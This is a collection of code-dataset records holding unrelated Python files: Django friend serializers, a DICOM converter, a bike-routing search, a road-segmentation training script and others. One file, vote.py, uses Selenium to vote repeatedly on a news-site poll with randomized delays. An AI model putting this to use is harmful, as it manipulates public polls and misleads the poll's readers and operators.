Meta:\n model = Friend\n fields = ['from_user_id', 'to_user_id', ]\n\n def create(self, validated_data):\n from_user_id = validated_data['from_user_id']\n to_user_id = validated_data['to_user_id']\n from_user=User.objects.get(pk=from_user_id)\n to_user=User.objects.get(pk=to_user_id)\n Friend.objects.add_friend(\n from_user=from_user,\n to_user=to_user,\n )\n return validated_data\n\nclass DeleteFriendSerializer(serializers.ModelSerializer):\n from_user_id=IntegerField()\n to_user_id=IntegerField()\n class Meta:\n model = Friend\n fields = ['from_user_id', 
'to_user_id', ]\n\n def destroy(self, request):\n from_user_id = request['from_user_id']\n to_user_id = request['to_user_id']\n from_user=User.objects.get(from_user_id)\n to_user=User.objects.get(to_user_id)\n Friend.objects.remove_friend(\n from_user=from_user,\n to_user=to_user,\n )\n return request\n\nclass AcceptFriendRequestSerializer(serializers.ModelSerializer):\n request_id = IntegerField()\n class Meta:\n model = FriendshipRequest\n fields = ['request_id', ]\n\n def create(self, validated_data):\n request_id = validated_data['request_id']\n friend_request = FriendshipRequest.objects.get(pk=request_id)\n friend_request.accept()\n return validated_data\n\nclass RejectFriendRequestSerializer(serializers.ModelSerializer):\n request_id = IntegerField()\n class Meta:\n model = FriendshipRequest\n fields = ['request_id', ]\n\n def destroy(self, validated_data):\n request_id = validated_data['request_id']\n friend_request = FriendshipRequest.objects.get(pk=request_id)\n friend_request.reject()\n return validated_data","sub_path":"deploy/back-end/friendapi/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"292851175","text":"import binascii\nimport io\nimport os\nimport sys\nimport math\n\nimport PIL.Image\nimport pydicom\nimport numpy as np\n\nfrom shutil import copyfile\n\nerr = []\nwalk_dir = os.path.abspath(sys.argv[1])\nout_dirs = []\nfor i in range(2,len(sys.argv)):\n out_dirs.append(os.path.abspath(sys.argv[i]))\nprint('walk_dir (absolute) = ' + os.path.abspath(walk_dir))\nprint('out_dirs (absolute) = ' + str(out_dirs))\n\nfor root, subdirs, files in os.walk(walk_dir):\n print('--\\nroot = ' + root)\n\n for subdir in subdirs:\n print('\\t- subdirectory ' + subdir)\n\n for filename in files:\n file_path = os.path.join(root, filename)\n print('\\t- file %s (full path: %s)' % (filename, file_path))\n if filename.endswith('.dcm'):\n try:\n orig = pydicom.dcmread(file_path)\n pix_arr = orig.pixel_array\n img = PIL.Image.fromarray(pix_arr.astype('uint8'))\n if(img.mode == 'I;16'):\n img.mode = 'I'\n # print(img,orig)\n img = img.point(lambda i:i*(1./4)).convert('L')\n for out in out_dirs:\n fold = os.path.join(out,subdir)\n if not os.path.isdir(fold):\n os.mkdir(fold)\n pat = os.path.join(fold,filename)\n img.save(pat[:-4] + '.jpg')\n print('\\t- saved file ' + filename[:-4] + '.jpg' +\n ' (full path: ' + pat[:-4] + '.jpg' + ')')\n except NotImplementedError as e:\n print('\\t- ERROR: ' + str(e))\n err.append(str(e))\n pass\n elif filename.endswith('.jpg') or filename.endswith('jpeg'):\n for out in out_dirs:\n fold = os.path.join(out,subdir)\n if not os.path.isdir(fold):\n os.mkdir(fold)\n pat = os.path.join(fold,filename)\n copyfile(file_path,pat[:-4] + '.jpg')\n print('\\t- saved file ' + filename[:-4] + '.jpg' +\n ' (full path: ' + pat[:-4] + '.jpg' + ')')\n\nif len(err) > 0: print(err)\n","sub_path":"dcm-jpg.py","file_name":"dcm-jpg.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"262942643","text":"import bike\n\nC = 20 # 车的容量\nd = bike.d # d(i, j)表示i到j的距离\nB = bike.B # B(i, t)表示i点在t时刻的需求量\nT = 60 # 时间限制\nhave_buf = True\n\n\nclass Node(object):\n\n def __init__(self, parent, i):\n self.i = i\n self.parent = parent\n if parent:\n self.t = parent.t + parent.td + d(parent.i, i)\n else:\n self.t = 0\n\n if not parent:\n self.is_first = True\n else:\n 
self.is_first = False\n\n self.service()\n\n # 输出到当前节点的路径(递归)\n def print_node(self):\n if self.parent:\n self.parent.print_node()\n print(self.i, self.t, B(self.i, self.t),\n self.parent.buf[self.i], -self.x, self.C, sep='\\t')\n else:\n return\n\n def print_path(self):\n self.print_node()\n print('')\n\n # buf表示每个地方的库存\n def service(self):\n if self.is_first:\n self.sum = 0\n self.C = 0\n # buf表示每个站点的累计装卸,+表示获得,-表示失去\n self.buf = [0, 0, 0, 0, 0, 0]\n self.td = 0\n self.x = 0\n\n else:\n parent = self.parent\n i = self.i\n buf = parent.buf.copy()\n if have_buf:\n need = B(self.i, self.t) + buf[i]\n else:\n need = B(self.i, self.t)\n x = 0 # x表示装卸量, 恒为正\n\n # i车辆不足\n if need < 0:\n if abs(need) >= parent.C:\n x = parent.C\n buf[i] += x\n self.C = 0\n else:\n x = abs(need)\n buf[i] += x\n self.C = parent.C - x\n # i车辆过剩\n else:\n if need > C - parent.C:\n x = C - parent.C\n buf[i] -= x\n self.C = C\n else:\n x = need\n buf[i] -= x\n self.C = parent.C + x\n self.sum = parent.sum + x\n self.buf = buf\n self.td = 0.2 * x\n if need < 0:\n self.x = -x\n else:\n self.x = x\n\n\ndef DFS(opt=-1):\n s = [] # 这是一个栈\n max_Q = 0\n node = Node(parent=None, i=1)\n s.append(node)\n while s:\n node = s.pop()\n if node.t > T:\n continue\n else:\n max_Q = max(max_Q, node.sum)\n if opt != -1 and node.sum >= opt:\n node.print_path()\n for i in [2, 3, 4, 5]:\n # 下一个节点不要访问自己\n if i == node.i:\n continue\n new_node = Node(parent=node, i=i)\n # 如果新节点还有时间,那就给他个机会\n if new_node.t <= T:\n s.append(new_node)\n\n return max_Q\n\n\ndef analysis(path):\n node = Node(parent=None, i=1)\n for j in range(len(path)):\n if path[j] == 1:\n continue\n new_node = Node(parent=node, i=path[j])\n node = new_node\n\n print(node.sum)\n node.print_path()\n\n\nif __name__ == '__main__':\n flag = 2\n have_buf = True\n\n if flag == 1: # 找出指定T下的最优解\n max_Q = DFS()\n print(max_Q)\n DFS(max_Q)\n\n elif flag == 2: # 判断指定路径下的Q和b\n path1 = [1, 5, 2, 4, 3, 4, 2, 5]\n path2 = [1, 5, 2, 4, 3, 2, 4, 5]\n path3 = [1, 5, 2, 4, 2, 3, 4, 3, 2]\n path4 = [4, 2, 4 ,3, 4, 5 ,4] \n print('i\\tt\\tB\\tbuf\\tb\\tCi')\n analysis(path4)\n\n elif flag == 3: # 比较不同T下的最大Q值\n for var_t in range(40, 66):\n T = var_t\n max_Q = DFS()\n print('T=%s Q=%d' % (T, max_Q))\n","sub_path":"共享单车/old/dfs-冲突-徐亮_Win7.py","file_name":"dfs-冲突-徐亮_Win7.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"628674812","text":"#-*- coding: utf-8 -*-\nfrom proteus import Model\nimport utils\nimport calles\n\ndef crear_inmueble(party):\n \"\"\"\n Crea un sigcoop_inmueble.inmueble asociado a party.\n\n Módulos que modifican inmueble:\n sigcoop_inmueble/inmueble.py\n\n Campos:\n calle_dom = fields.Char('Calle', required=True)\n numero_dom = fields.Char('Numero', required=True)\n cp_dom = fields.Char('CP', required=True)\n localidad_dom = fields.Char('Localidad', required=True)\n partido_dom = fields.Char('Partido', required=True)\n titulares = fields.Many2Many('sigcoop_inmueble.inmueble_titular','inmueble_id', 'titular_id', 'Titulares del inmueble')\n \"\"\"\n Inmueble = Model.get('sigcoop_inmueble.inmueble')\n inmueble = Inmueble()\n inmueble.calle_dom = utils.random_from_list(calles.calles)\n inmueble.numero_dom = 'nro'\n inmueble.cp_dom = 'cp'\n inmueble.localidad_dom = 'localidad'\n inmueble.partido_dom = 'partido'\n inmueble.titulares.append(party)\n inmueble.save()\n return 
inmueble\n","sub_path":"scripts/inmueble.py","file_name":"inmueble.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"221024996","text":"from selenium import webdriver\nimport time\nimport random\n\ntarget_url = 'http://news.hankyung.com/poll/10504'\n#target_url = 'http://news.hankyung.com/poll/10504'\n\ndef vote():\n browser = webdriver.Chrome(r'C:\\chromedriver\\chromedriver.exe')\n browser.get(target_url)\n time.sleep(1)\n input = browser.find_element_by_id('qu01')\n input.click()\n time.sleep(1)\n button = browser.find_element_by_class_name('vote-btn')\n button.click()\n time.sleep(1)\n browser.quit()\n\nif __name__ == '__main__':\n for i in range(10):\n vote()\n time.sleep(random.randrange(1, 10))","sub_path":"crawler/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551269621","text":"#!/usr/bin/env python\n\"\"\" \"\"\"\n\n# Standard library modules.\nimport unittest\nimport logging\n\n# Third party modules.\n\n# Local modules.\nfrom pyhmsa_gui.util.human import camelcase_to_words\n\n# Globals and constants variables.\n\nclass TestModule(unittest.TestCase):\n\n def setUp(self):\n unittest.TestCase.setUp(self)\n\n def tearDown(self):\n unittest.TestCase.tearDown(self)\n\n def testcamelcase_to_words(self):\n text = 'JohnDoe'\n actual = camelcase_to_words(text)\n expected = ('John', 'Doe')\n self.assertEqual(expected, actual)\n\n text = 'JohnDoeAndJaneDoe'\n actual = camelcase_to_words(text)\n expected = ('John', 'Doe', 'And', 'Jane', 'Doe')\n self.assertEqual(expected, actual)\n\n text = 'John'\n actual = camelcase_to_words(text)\n expected = ('John',)\n self.assertEqual(expected, actual)\n\nif __name__ == '__main__': #pragma: no cover\n logging.getLogger().setLevel(logging.DEBUG)\n unittest.main()\n","sub_path":"pyhmsa_gui/util/test_human.py","file_name":"test_human.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"598843195","text":"import multiprocessing\nimport re\nimport os.path\nimport tensorflow as tf\nimport helper2_bev\nimport warnings\nfrom distutils.version import LooseVersion\nimport project_tests as tests\nfrom glob import glob\nimport numpy as np\nfrom skimage import io\nfrom skimage.transform import rescale, resize, downscale_local_mean\nimport cv2\nimport scipy.misc\nfrom PIL import Image\nimport random\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer. You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. 
Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n \"\"\"\n Load Pretrained VGG Model into TensorFlow.\n :param sess: TensorFlow Session\n :param vgg_path: Path to vgg folder, containing \"variables/\" and \"saved_model.pb\"\n :return: Tuple of Tensors from VGG model (image_input, keep_prob, layer3_out, layer4_out, layer7_out)\n \"\"\"\n # TODO: Implement function\n # Use tf.saved_model.loader.load to load the model and weights\n vgg_tag = 'vgg16'\n vgg_input_tensor_name = 'image_input:0'\n vgg_keep_prob_tensor_name = 'keep_prob:0'\n vgg_layer3_out_tensor_name = 'layer3_out:0'\n vgg_layer4_out_tensor_name = 'layer4_out:0'\n vgg_layer7_out_tensor_name = 'layer7_out:0'\n\n tf.saved_model.loader.load(sess, [vgg_tag], vgg_path)\n image_input = tf.get_default_graph().get_tensor_by_name(vgg_input_tensor_name)\n keep_prob = tf.get_default_graph().get_tensor_by_name(vgg_keep_prob_tensor_name)\n layer3_out = tf.get_default_graph().get_tensor_by_name(vgg_layer3_out_tensor_name)\n layer4_out = tf.get_default_graph().get_tensor_by_name(vgg_layer4_out_tensor_name)\n layer7_out = tf.get_default_graph().get_tensor_by_name(vgg_layer7_out_tensor_name)\n \n return image_input, keep_prob, layer3_out, layer4_out, layer7_out\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n \"\"\"\n Create the layers for a fully convolutional network. Build skip-layers using the vgg layers.\n :param vgg_layer7_out: TF Tensor for VGG Layer 3 output\n :param vgg_layer4_out: TF Tensor for VGG Layer 4 output\n :param vgg_layer3_out: TF Tensor for VGG Layer 7 output\n :param num_classes: Number of classes to classify\n :return: The Tensor for the last layer of output\n \"\"\"\n # TODO: Implement function\n # 1x1 convolution of vgg layer 7\n layer7a_out = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # upsample\n layer4a_in1 = tf.layers.conv2d_transpose(layer7a_out, num_classes, 4, \n strides= (2, 2), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # make sure the shapes are the same!\n # 1x1 convolution of vgg layer 4\n layer4a_in2 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # skip connection (element-wise addition)\n layer4a_out = tf.add(layer4a_in1, layer4a_in2)\n # upsample\n layer3a_in1 = tf.layers.conv2d_transpose(layer4a_out, num_classes, 4, \n strides= (2, 2), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # 1x1 convolution of vgg layer 3\n layer3a_in2 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # skip connection (element-wise addition)\n layer3a_out = tf.add(layer3a_in1, layer3a_in2)\n # upsample\n nn_last_layer = tf.layers.conv2d_transpose(layer3a_out, num_classes, 16, \n strides= (8, 8), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n 
kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n return nn_last_layer\n#tests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n \"\"\"\n Build the TensorFLow loss and optimizer operations.\n :param nn_last_layer: TF Tensor of the last layer in the neural network\n :param correct_label: TF Placeholder for the correct label image\n :param learning_rate: TF Placeholder for the learning rate\n :param num_classes: Number of classes to classify\n :return: Tuple of (logits, train_op, cross_entropy_loss)\n \"\"\"\n # TODO: Implement function\n # make logits a 2D tensor where each row represents a pixel and each column a class\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n correct_label = tf.reshape(correct_label, (-1,num_classes))\n # define loss function\n\n #cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits= logits, labels= correct_label))\n cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits= logits, labels= correct_label))\n # define training operation\n optimizer = tf.train.AdamOptimizer(learning_rate= learning_rate)\n train_op = optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate, iterator,seed):\n \"\"\"\n Train neural network and print out the loss during training.\n :param sess: TF Session\n :param epochs: Number of epochs\n :param batch_size: Batch size\n :param get_batches_fn: Function to get batches of training data. Call using get_batches_fn(batch_size)\n :param train_op: TF Operation to train the neural network\n :param cross_entropy_loss: TF Tensor for the amount of loss\n :param input_image: TF Placeholder for input images\n :param correct_label: TF Placeholder for label images\n :param keep_prob: TF Placeholder for dropout keep probability\n :param learning_rate: TF Placeholder for learning rate\n \"\"\"\n # TODO: Implement function\n next_element = iterator.get_next()\n sess.run(tf.global_variables_initializer())\n \n print(\"Training...\")\n #print()\n for i in range(epochs):\n #sess.run(iterator.initializer)\n print(\"EPOCH {} ...\".format(i+1))\n #for image, label in get_batches_fn(batch_size):\n #for i in batch_size:\n # _, loss = sess.run([train_op, cross_entropy_loss], \n # feed_dict={input_image: image, correct_label: label, keep_prob: 0.5, learning_rate: 0.0009})\n # print(\"Loss: = {:.3f}\".format(loss))\n #images = []\n #gt_images = []\n # Compute for 100 epochs.\n\n #sess.run(iterator.initializer)\n sess.run(iterator.initializer, feed_dict={seed: i})\n\n while True:\n try:\n image,label = sess.run(next_element)\n\n #print(\"build batch\")\n\n #print('image',image)\n #print('shape',image[0].shape)\n #print('label',label[0].shape)\n #images.append(image)\n #gt_images.append(label[0])\n #print(len(image))\n #print(len(label))\n\n except tf.errors.OutOfRangeError:\n break\n #images_np = np.array(images)\n #gt_images_np = np.array(gt_images)\n #print('shape images',images_np.shape)\n #print('shape images',images_np.shape)\n #print('loss')\n _, loss = sess.run([train_op, cross_entropy_loss], feed_dict={input_image: image, correct_label: label, keep_prob: 0.5, learning_rate: 0.0009})\n ##########\n print(\"Loss: = {:.5f}\".format(loss))\n\n\n\n\n\n#tests.test_train_nn(train_nn)\n\n# background_color = np.array([255, 0, 0])\n\n# def _parse_function(filename, 
label):\n# print('file',filename)\n# print('label',label)\n# image_shape = (160, 576)\n \n# image_string = tf.read_file(filename)\n# image_decoded = tf.image.decode_png(image_string)\n# #image_resized = tf.image.resize_images(image_decoded, [4, 4])\n# image_resized = tf.image.resize_images(image_decoded, image_shape)\n\n# label_string = tf.read_file(label)\n# label_decoded = tf.image.decode_png(label_string)\n# label_resized = tf.image.resize_images(label_decoded, image_shape)\n\n# print('label', label_resized)\n# print('background_color',background_color)\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #images.append(image)\n# #gt_images.append(gt_image)\n# return image_resized, gt_image\n\n# def _read_resize_py_function(filename, label):\n# background_color = np.array([255, 0, 0])\n# image_shape = (160, 576)\n# # image_shape = (40, 128)\n# #image_decoded = cv2.imread(filename.decode(), cv2.IMREAD_GRAYSCALE)\n# #image_decoded = cv2.imread(filename.decode())\n# #print(filename.decode())\n# image_decoded = io.imread(filename.decode())\n# #print('hello')\n# #print(image_decoded.shape )\n# #print(image_decoded)\n# image_resized = resize(image_decoded, image_shape)\n\n# label_decoded = io.imread(label.decode())\n# label_resized = resize(label_decoded, image_shape)\n# #print (image_resized.shape)\n# #return image_decoded, label\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #print('gt_bg')\n# #print(gt_bg)\n# #print('gt_image')\n# #print(gt_image)\n# #print (image_resized.shape)\n# #print (gt_image.shape)\n# return image_resized, gt_image\n\n\n\n# def _read_resize_py_function(filename):\n\n# background_color = np.array([255, 0, 0])\n\n# image_shape = (160, 576)\n\n# folder_img = \"/home/shared/datasets/kitti_road/data_road/training/image_2\"\n# image_decoded = io.imread(folder_img+\"/\"+filename.decode())\n# print(folder_img+\"/\"+filename.decode())\n# image_resized = resize(image_decoded, image_shape)\n# #print(\"dataset\", folder_img+\"/\"+filename.decode())\n# filename_gt = re.sub(r'(?is)_', '_road_', filename.decode())\n# folder_gt = \"/home/shared/datasets/kitti_road/data_road/training/gt_image_2\" \n# label_decoded = io.imread(folder_gt+\"/\"+filename_gt)\n# print(folder_gt+\"/\"+filename_gt)\n# label_resized = resize(label_decoded, image_shape)\n# #print (image_resized.shape)\n# #return image_decoded, label\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #print('gt_bg')\n# #print(gt_bg)\n# #print('gt_image')\n# #print(gt_image)\n# #print (image_resized.shape)\n# #print (gt_image.shape)\n# #return image_resized, gt_image\n# return image_resized, gt_image\n\ndef blockshaped(arr, nrows, ncols):\n \"\"\"\n https://stackoverflow.com/questions/16873441/form-a-big-2d-array-from-multiple-smaller-2d-arrays/16873755#16873755\n Return an array of shape (n, nrows, ncols) where\n n * nrows * ncols = arr.size\n\n If arr is a 2D array, the returned array looks like n subblocks with\n each subblock preserving the \"physical\" layout of arr.\n \"\"\"\n h, w = arr.shape\n return (arr.reshape(h//nrows, nrows, -1, ncols)\n .swapaxes(1,2)\n .reshape(-1, nrows, ncols))\n\ndef unblockshaped(arr, h, w):\n \"\"\"\n 
https://stackoverflow.com/questions/16873441/form-a-big-2d-array-from-multiple-smaller-2d-arrays/16873755#16873755\n Return an array of shape (h, w) where\n h * w = arr.size\n\n If arr is of shape (n, nrows, ncols), n sublocks of shape (nrows, ncols),\n then the returned array preserves the \"physical\" layout of the sublocks.\n \"\"\"\n n, nrows, ncols = arr.shape\n return (arr.reshape(h//nrows, -1, nrows, ncols)\n .swapaxes(1,2)\n .reshape(h, w))\n\n\n\n\n\ndef depth_read(filename, left, right, top, bottom):\n # loads depth map D from png file\n # and returns it as a numpy array,\n # for details see readme.txt\n #depth_png = np.array(Image.open(filename), dtype=int)#####no rezize\n depth_png = Image.open(filename)\n cropped = depth_png.crop( ( left, top, right, bottom ) ) # size: 576 X 160\n #cropped.show()\n depth_png = np.array(cropped, dtype=int)\n # make sure we have a proper 16bit depth map here.. not 8bit!\n #depth_png.show()\n assert(np.max(depth_png) > 255)\n depth = depth_png.astype(np.float) / 256.\n depth = np.uint8(depth)\n #depth_png = depth_png.resize(new_size)\n #depth_png = np.array(depth_png, dtype=int)\n # make sure we have a proper 16bit depth map here.. not 8bit!\n #depth_png.show()\n #assert(np.max(depth_png) > 255)\n #depth = depth_png.astype(np.float) / 256.\n #depth[depth_png == 0] = -1.\n #depth = normalize(depth)\n #depth = np.uint8(depth)\n return depth\n\n\n\n\n\n\n\n\ndef _read_resize_py_function(filename):\n\n #background_color = np.array([0, 0, 255])\n background_color = np.array([0, 0, 0])\n r_color = np.array([255, 0, 0])#scipy.misc\n g_color = np.array([0, 255, 0])#scipy.misc\n b_color = np.array([0, 0, 255])#scipy.misc\n\n\n image_shape = (576,160)\n new_size =(576,160)\n width_d, height_d = 1242,375\n #width = width_d-576\n width = width_d-new_size[0]\n #height = height_d-160\n height = height_d-new_size[1]\n th_sky = 135 #threshold crop the sky\n left = random.randint(0, width) \n top = random.randint(th_sky, height)\n right, bottom = left+new_size[0], top+new_size[1]\n #image_arr = depth_read(filename, left, right, top, bottom)\n\n #folder_img = \"/home/shared/datasets/kitti_road/data_road/training/image_2\"\n\n #image_decoded = scipy.misc.imread(folder_img+\"/\"+filename.decode())\n #image_decoded = cv2.imread(folder_img+\"/\"+filename.decode())\n #image_decoded = Image.open(folder_img+\"/\"+filename.decode())\n #image_decoded = Image.open(folder_img+\"/\"+filename.decode())\n image_decoded = Image.open(filename.decode(),mode='r')\n\n #print(folder_img+\"/\"+filename.decode())\n #image_resized = scipy.misc.imresize(image_decoded, image_shape)\n #image_resized = cv2.resize(image_decoded, image_shape)\n #image_resized = Image.resize(image_decoded, image_shape)\n\n #image_decoded=image_decoded.resize(image_shape)\n cropped = image_decoded.resize( new_size ) # size: 576 X 160\n image_resized = np.array(cropped)\n #print(image_resized.shape)\n\n\n #print(\"dataset\", folder_img+\"/\"+filename.decode())\n\n #print(\"orig\",np.max(image_resized),np.min(image_resized))\n\n\n#print(image_resized)\n a = [-128,-128,-128]\n image_norm = np.sum((image_resized,a),axis=0)\n #print(\"resta\",np.max(image_norm),np.min(image_norm))\n\n image_norm = np.divide(image_norm,128)\n #cropped.save(\"nn.png\")\n #image_norm.astype(np.float32)\n\n #print (image_norm)\n #print(\"norm\",np.max(image_norm),np.min(image_norm))\n\n\n filename_gt = re.sub(r'(?is)data/', 'gt/', filename.decode())\n\n # filename_gt = re.sub(r'(?is)kitti_raw/raw_data', 
'depth_kitti/depth/depth_single_img/train', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_30/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_29/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_28/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_26/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_10_03/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)data/', '', filename_gt)\n #print(\"filename\",filename_gt)\n #folder_gt = \"/home/shared/datasets/kitti_road/data_road/training/gt_image_2\" \n\n #label_decoded = scipy.misc.imread(folder_gt+\"/\"+filename_gt)\n #label_decoded = cv2.imread(folder_gt+\"/\"+filename_gt)\n #label_decoded = Image.open(folder_gt+\"/\"+filename_gt)\n #image_arr = depth_read(filename_gt,image_shape)\n # image_arr = depth_read(filename_gt, left, right, top, bottom)\n\n\n\n\n\n\n\n image_decodedgt = Image.open(filename_gt,mode='r')\n\n #print(folder_img+\"/\"+filename.decode())\n #image_resized = scipy.misc.imresize(image_decoded, image_shape)\n #image_resized = cv2.resize(image_decoded, image_shape)\n #image_resized = Image.resize(image_decoded, image_shape)\n\n #image_decoded=image_decoded.resize(image_shape)\n croppedgt = image_decodedgt.resize( new_size ) # size: 576 X 160\n\n\n\n label_resized= np.array(croppedgt)\n\n gt_bg = np.all(label_resized == background_color, axis=2)\n gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n\n gt_r = np.all(label_resized == r_color, axis=2)\n gt_r= gt_r.reshape(*gt_r.shape, 1)\n\n gt_g = np.all(label_resized == g_color, axis=2)\n gt_g = gt_g.reshape(*gt_g.shape, 1)\n\n gt_b = np.all(label_resized == b_color, axis=2)\n gt_b = gt_b.reshape(*gt_b.shape, 1)\n\n\n # gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n gt_image = np.concatenate((gt_bg, gt_r, gt_g, gt_b), axis=2)\n\n # print(\"shape image\",image_decoded.shape)\n # print(\"shape gt image\",gt_image.shape)\n\n ###############one hot########################\n # img_array = np.reshape(label_resized,(np.size(label_resized)))\n # one_hot = np.eye(4)[img_array]\n #print(one_hot.shape)\n #one_hot_b=blockshaped(one_hot, 1242, 85)\n #one_hot_b=blockshaped(one_hot, image_shape[0], 85)\n # 4 clases\n # one_hot =one_hot.reshape(160,576,4)\n #print(one_hot.shape)\n #one_hot_b=blockshaped(one_hot, image_shape[0], 85)\n #print(one_hot_b.dtype)\n # one_hot_b = one_hot.astype(bool)\n\n\n\n\n #print(label_resized.shape)\n #print(\"show\")\n #label_decoded.show()\n #print (label_resized)\n #gt_bg = np.all(label_resized == background_color, axis=2)\n #print(gt_bg.shape)\n #print(gt_bg[0][0])\n #gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n #print(gt_bg[0][0])\n #gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n\n\n\n #one_hot_b = one_hot_b.astype(bool)\n # gt_image = one_hot_b\n #print(gt_image[100][100])\n #print(gt_image.shape)\n #print(\"max\",np.max(label_resized))\n #print(\"min\",np.min(label_resized))\n #print(\"gt max\",np.max(gt_image))\n #print(\"gt min\",np.max(gt_image))\n #return folder_img+\"/\"+filename.decode(), folder_gt+\"/\"+filename_gt\n #print(\"shape image\",image_decoded.shape)\n #print(\"shape gt image\",gt_image.shape)\n\n\n\n\n\n\n\n\n\n\n\n#######################################################\n # print(\"gt shape\",gt_image.shape)\n # print(\"image_norm\",image_norm.shape)\n#######################################################\n\n\n #print(\"gt\",gt_image)\n #print(\"ax2\",np.size(gt_image,axis=2))\n #print(\"ax1\",np.size(gt_image,axis=1))\n #print(\"ax0\",np.size(gt_image,axis=0))\n #return cropped, gt_image\n return 
image_norm, gt_image\n #return image_decoded,image_decoded\n\n\n\n\n# def input_pipeline(filenames, batch_size, num_shards, seed=None):\n# #dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n# #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n# #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n# dataset = (tf.data.TextLineDataset(filenames).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count()))#, cycle_length=5) \n# dataset = dataset.shuffle(buffer_size=10000, seed=seed)\n# #dataset = tf.data.TextLineDataset(filenames)\n# #dataset = dataset.map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])))\n# batched_dataset = dataset.batch(batch_size)\n# #dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n# #dataset = dataset.map(lambda filename, label: tuple(tf.py_func( _read_resize_py_function, [filename, label], [tf.double, tf.bool])))\n# #dataset = dataset.shuffle(buffer_size=10000)\n# #batched_dataset = dataset.batch(batch_size)\n# #iterator = batched_dataset.make_one_shot_iterator()\n# #iterator = batched_dataset.make_initializable_iterator()\n# return batched_dataset.make_initializable_iterator()\n\ndef input_pipeline(filenames, batch_size, num_shards, seed=None):\n\n dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: 